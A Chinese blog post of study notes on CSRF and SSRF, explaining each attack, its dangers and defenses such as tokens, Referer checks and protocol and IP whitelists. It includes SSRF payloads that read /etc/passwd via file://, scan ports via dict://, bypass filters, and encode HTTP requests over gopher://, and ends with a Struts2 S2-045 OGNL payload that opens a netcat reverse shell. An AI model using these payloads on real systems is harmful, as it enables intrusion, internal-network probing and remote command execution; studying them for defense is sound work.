CSRF与SSRF

最新推荐文章于 2024-06-28 17:09:50 发布
最新推荐文章于 2024-06-28 17:09:50 发布
阅读量98 收藏
点赞数
文章标签: csrf 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlk_a1540775228/article/details/131871799
版权

Cross-site Request Forgery

跨站请求伪造CSRF

核心是让受害者用自己的cookie取发送攻击者的请求

-- 借助社工对网站身份的恶意利用

1.用户在某网站A进行登录-------->身份验证成功,返回cookie给用户---------->攻击者构建一个网站F,诱使用户使用同一浏览器进入------------->网站F收到用户请求后,返回恶意代码给用户,强制他访问网站A---------->用户浏览器在网站A上执行相关操作(以已经持有的cookie)

#同源策略并不阻止一个网站向另一个域提出请求,但它确实阻止提出请求的网站处理跨域请求的响应

攻击将所有请求参数放入隐藏表单字段中, 并包含一段用于自动提交表单的脚本,用户的浏览器提交此表单时, 将自动添加用户的目标域的cookie,并且应用程序会正常处理生成的请求。如果管理用户登录到易受攻击的应用程序,并访问攻击者的包含此表单的Web页面,该请求将在管理员的会话中处理,攻击者的账户因此得以创建

#XSS:
直接控制用户浏览器,然后再执行相关操作,#若有请求,Referer自动为本站
#CSRF:
通过伪装(伪造、更改状态的请求)用户身份(即盗用身份),通过服务器身份认证后,然后发送恶意请求(服务器会认为请求是合法的),#Referer为外站

#防御:
1.设置会话过期
2.敏感操作根据Cookie动态生成token嵌入表单中;
3.设置交互操作比如密保,验证码等
3.检测Referer字段,设置白名单


#Token  针对敏感页面动态生成,每次提交都验证,交互模式                                   
   例如token=base64(RSA(uid.时间戳.随机数.过期时间.签名等等))
   1.客户端每次刷新访问敏感页面,服务端绑定Cookie会生成随机token发送给客户端;
   2.每次访问敏感页面都会动态生成token很快过期,只有在访问的时候提交,服务器才能验证通过刚刚的请求下发的token,不通过会否认此处提交
-- 改密码
<form method="GET" action="#">
	新密码:<br>
	<input type="password" name="password_new" autocomplete="off"><br>
	确认密码:<br>
	<input type="password" name="password_conf" autocomplete="off"><br>
	<br>
	<input type="submit" name="Change" value="Change">
<input type="hidden" value="3b62f7ca53d9aa5b31dde6051c039d8a" name="user_token">
</form>

CSRF:
1.因此黑客制作的表单的token值是黑客自己的Cookie映射的,受害者访问对应页面时改的是黑客的密码
2.想要绕过,需要制作一个能够访问http://目标服务器/change.php的HTML文件,里面的js实现填写对应表单的密码(代码里黑客写死的),而这种情况势必触发同源策略.(HTML文件存在是黑客的攻击服务器)

Server-Site Request Forgery

服务端请求伪造SSRF

1.原理
SSRF漏洞成因:
-- 服务端提供了从其他服务器应用获取数据的功能;
-- 服务端对目标地址未做过滤与限制 。
攻击目标:一般情况下 , SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)

2.危害
2.1对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息
2.2攻击运行在内网或本地的应用程序。
2.3对内网 Web应用进行指纹识别,识别企业内部的资产信息 。
2.4攻击内外网的Web应用,主要是使用 HTTP GET请求就可以实现的攻击(比如struts2 、 SQli等) 
2.5利用自file协议读取本地文件等 。

dict:// gopher:// data:// file:// http://
#端口扫描
?url=dict://192.168.1.4:80
#读取系统本地文件
url=file://c:\windows\system32\drivers\etc\hosts
url=file://../../../../etc/passwd
#绕过
1.url=http://www.x.com@10.0.0.1  实际访问的是@后面的
2.将IP地址进行进制转换。url=http://2021942054
域名/IP     获取的IP地址       数字地址     运营商         IP的物理位置
woniu.com  120.132.99.38    2021942054   电信&联通       中国江苏苏州 ip138提供


#漏洞挖掘
图片加载下载、分享页面、收藏、点赞、在线翻译、未公开的api

从URL中的关键字进行挖掘:
?query=
api
mark
share
wap
url
link
src
source
target
u
3g
display
sourceURL
imageURL
domain


#防御

1.限制协议:白名单
限制请求的端口只能为Web端口,只允许访问 HTTP和HTTPS 的请求,禁止其他协议。
2.限制IP:
目的:避免应用被用来获取内网数据,攻击内网。
对传入的url进行过滤,将符合内网IP特征的信息过滤掉。
3.限制端口:
限制请求的端口为http常用的端口,比如8044380808090等。
对于其他异常端口则进行过滤,如3306等。
4.过滤返回信息:
验证并过滤远程服务器对请求的响应,是比较简单防御方法。比如说原本服务器这个功能是用来识图的,那么如果接受到的响应发现不是一张图片,则过滤掉。
5.统一错误信息:
避免攻击者根据错误信息来判断远端服务器的端口状态,比如错误信息全部改为404#gopher://默认端口是70
Gopher协议格式:
URL:gopher://<host>:<port>/<gopher-path>/_后接TCP数据流
如gopher://192.168.0.119:2333/_abcd  abcd即发过去的数据流

1.GET型的HTTP包
GET /ssrf/base/get.php?name=Margin HTTP/1.1
Host: 192.168.0.109

gopher://192.168.0.109:80/_GET%20/ssrf/base/get.php%3fname=Margin%20HTTP/1.1%0d%0AHost:%20192.168.0.109%0d%0A
问号(?)需要转码为URL编码,回车换行要变为%0d%0a,HTTP包的最后要加%0d%0a,代表消息结束(

2.POST型HTTP包
POST /ssrf/base/post.php HTTP/1.1
host:192.168.0.109
Content-Type:application/x-www-form-urlencoded
Content-Length:11
name=Margin

如果多个参数,参数之间的&也需要进行URL编码
gopher://192.168.0.109:80/_POST%20/ssrf/base/post.php%20HTTP/1.1%0d%0AHost:192.168.0.109%0d%0AContent-Type:application/x-www-form-urlencoded%0d%0aContent-Length:11%0d%0A%0d%0aname=Margin%0d%0A


#gopher协议反弹shell
搭配Struts2-045漏洞
payload:
GET /S2-045/ HTTP/1.1
Host: 192.168.0.119
Content-Type:%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nc -e /bin/bash 192.168.0.119 6666').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
xlk_a1540775228
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRFSSRF与XXE
j1044957016的博客
05-31 645
文章目录前言一、CSRF1.CSRF的简介2.CSRF的防御与检测二、SSRF1.SSRF简介2.SSRF容易出现的地方3.SSRF会造成的危害4.防御措施总结 前言 系统的梳理下CSRFSSRF的知识点 一、CSRF 1.CSRF的简介 CSRF又称跨站请求伪造,XSS就是CSRF中的一种。跨站请求伪造指的是伪造客户端请求。 发生条件: 用户在正常网站A登录的情况下 访问了保存有恶意代码的另一个网站B B网站劫持用户的登陆状态以用户的身份对网站A发送请求,一般是劫持了COOKIE信息。 当服务端对这
29 WEB漏洞-CSRFSSRF漏洞案例讲解-附件资源
03-02
29 WEB漏洞-CSRFSSRF漏洞案例讲解-附件资源
CSRFSSRF漏洞】
个人学习参考
03-09 903
本篇文章仅作为本人学习笔记CSRF:跨站请求伪造 (Cross-Site Request Forgery, CSRF),也被称为 One Click Attack 或者 Session Riding ,通常缩写为 CSRF,是一种对网站的恶意利用。尽管听起来像 XSS,但它与 XSS 非常不同,XSS 利用站点内的信任用户,而 CSRF 则通过伪装来自受信任用户的请求来利用受信任的网站。
CSRFSSRF比较
RMC131的博客
04-13 1012
因其是由服务器端发起的,所以能够请求到与服务器相连但与外网隔离的**内部系统。与XSS比较,XSS攻击是跨站脚本攻击,CSRF是跨站请求伪造,也就是说CSRF攻击不是出自用户之手,是经过第三方的处理,伪装成了受信任用户的操作。XSS是让用户触发恶意代码,实际的操作还是用户本身进行的,只是用户是无意识的。要伪造用户的操作最好的方法还是使用XSS或链接引导等,让用户在无意识的情况下完成操作。地址过于信任,没有经过严格的检测,导致攻击者以此为跳板攻击其他服务器或内网。,向服务器发送请求。是服务器对用户提供的。
CSRFSSRF详解
剁椒鱼头没剁椒的博客
11-29 4674
  CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。   CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。  1)首先用户登录网站,并且生产本地的cookie。   2)用户在未登陆出网站的时候,访问攻击者构建的恶意网站。   当然若你关闭网站去访问恶意网站就会避免该问题,但不是绝对的,相信在日常使用中都会存在浏览器同时打开多个页面,很少说有人去访问一个网站的时候把另外的网
CSRFSSRF
bossDDYY的博客
07-27 1479
CSRFSSRF
CSRFSSRF原理,防御
2301_77315080的博客
09-06 394
跨站请求伪造(英语: Cross-site request forgery),也被称为one- click attack或者sessionriding,通常缩写为CSRF或者XSRF;是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS利用的是用户对指定网站的信任,CSRF利用的是网站对用户网页浏览器的信任。
csrfssrf的区别,攻击如何防护
白帽子凯哥聊黑客
12-14 2120
CSRF(跨站请求伪造)和SSRF(服务器端请求伪造)都是网络安全中的常见攻击类型,但它们的目标和攻击方式有所不同。理解这两种攻击的区别对于有效地防御它们至关重要。CSRFSSRF的主要区别在于攻击的发起者和目标。CSRF利用了用户的浏览器来攻击用户已经认证的Web应用,而SSRF直接利用了服务器端应用来发起对其他系统的请求。两者都需要通过严格的输入验证和适当的安全措施来防御。 目标:CSRF攻击目标是利用网站用户的浏览器,迫使用户在已认证的Web应用中执行非预期的操作。工作原理:攻击示例:防御措施:目标
CSRFSSRF
samli的博客
03-12 740
CSRF漏洞简介 CSRF(Cross-site request forgery,跨站请求伪造),是指利用受害者尚未失效的身份认证信息( cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直...
CSRFSSRF原理、区别、防御方法
2301_76786857的博客
12-26 1928
它是一种利用用户在已登录的网站中提交非法请求的行为,攻击者通过伪造用户提交的请求,将恶意请求发送至受信任的网站,导致用户在不知情的情况下执行恶意操作。两者区别:CSRF是用户端发起请求,攻击者利用用户的Cookie信息伪造用户请求发送至服务器;而SSRF是服务端发起的请求,攻击者通过构造指定URL地址获取网页文本内容、加载指定地址的图片、下载等方式,利用存在缺陷的Web应用作为代理攻击远程和本地的服务器。5.限制请求的端口为http常用的端口,例如80、443、8080、8090等;
第29天:WEB漏洞-CSRFSSRF漏洞案例讲解1
08-03
1、当用户发送重要的请求时需要输入原始密码 3、检验 referer 来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章, 4、设置验证码
008-Web安全基础4 - 请求伪造漏洞.pptx
10-11
SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统 可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的) 使用...
SecExample:JAVA 漏洞靶场 (Vulnerability Environment For Java)
07-24
star:[CSRF漏洞]:glowing_star::glowing_star:[SSRF漏洞]:glowing_star::glowing_star:[CORS漏洞]:glowing_star::glowing_star::glowing_star::glowing_star:[反序列化漏洞-Fastjson反序列化]:glowing_star::glowing...
ValidateAntiForgeryToken、AntiForgeryToken 防止CSRF(跨网站请求伪造)
最新发布
u013400314的博客
06-28 173
换句话说,[ValidateAntiForgeryToken]必须和[HttpPost]同时加在一个ACTION上才可以正常使用。2、[ValidateAntiForgeryToken],根据传过来的令牌进行对比,如果相同,则允许访问,如果不同则拒绝访问。1、<%:Html.AntiForgeryToken()%> 或@Html.AntiForgeryToken()在Controller->Action动作上:[ValidateAntiForgeryToken]用途:防止CSRF(跨网站请求伪造)。
网络安全:Web 安全 面试题.(CSRF
网络安全领域___专研者.
06-21 619
网络安全面试是指在招聘过程中,面试官会针对应聘者的网络安全相关知识和技能进行评估和考察。这种面试通常包括以下几个方面: (1)基础知识:包括网络基础知识、操作系统知识、密码学知识等。 (2)安全技术:如入侵检测、防火墙配置、密码管理、漏洞分析等技术的掌握程度。 (3)安全实践:评估应聘者在实际工作中解决网络安全问题的能力,如案例分析、渗透测试等。 (4)安全意识:了解应聘者对网络安全的重视程度和责任心,以及在安全事故发生时的应对能力。 (5)项目经验:询问应聘者参与过的网络安全相关项目,了解其在项目中的具体
CSRF的其他防范措施?
m0_58989398的博客
06-28 723
一般情况下,我们可以通过各种防护策略来防御CSRF,对于QA、SRE、安全负责人等,我们可以做哪些事情来提升安全性呢?一、CSRF测试CSRFTester是一款CSRF漏洞的测试工具,CSRFTester工具的测试原理大概是这样的,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一次伪造客户端请求,如果修改后的测试请求成功被网站服务器接受,则说明存在CSRF漏洞,当然此款工具也可以被用来进行CSRF攻击。
JavaScript检查对象是否包含某个属性
徐三岁的博客
06-28 467
当使用 Object.prototype.hasOwnProperty.call 时,实际上是在调用 hasOwnProperty 方法,并明确指定 this 的值,这使得可以检查任何对象是否拥有指定的属性。使用 Object.prototype.hasOwnProperty.call 的好处是,它允许将 hasOwnProperty 方法作为一个函数传递给其他函数,或者在不直接引用对象的情况下使用它。hasOwnProperty 方法会检查对象自身是否具有指定的属性,而不考虑原型链。
风水研究会官网源码系统-可展示自己的领域内容-商品售卖等
haojiehero123的博客
06-23 519
整洁大气,非常漂亮,前端内容均可通过后台修改。
csrfssrf区别
08-06
回答: CSRFSSRF 是两种不同的攻击方式。 CSRF(Cross-Site Request Forgery,跨站请求伪造)攻击是由于服务器没有对用户提交的数据进行严格的控制,导致攻击者可以利用用户的身份信息(如 cookie)伪造用户身份...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值